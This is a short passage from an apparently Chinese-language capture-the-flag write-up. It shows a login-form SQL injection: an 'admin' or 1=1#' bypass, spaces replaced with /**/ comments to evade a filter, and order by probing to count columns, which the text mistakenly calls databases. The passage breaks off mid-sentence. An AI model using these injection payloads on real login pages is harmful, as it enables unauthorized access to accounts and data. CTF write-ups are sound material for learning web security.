进入题目,发现页面和之前的web2一样,试试看万能密码登陆:username=admin' or 1=1#&password=123
不出所料,万能钥匙还是被ban了,试试看过滤了什么
测试发现,题目过滤了空格,那么我们就用/**/来绕过空格:username=admin'/**/or/**/1=1#&password=123
发现可以成功登陆,接下来老方法,测试有几个数据库:username=admin'/**/or/**/1=1/**/order/**/by/**/3#&password=123
username=admin'/**/or/**/1=1/**/order/**/by/**/4#&password=123
到4时发现没有回显,说明有3个数据库
接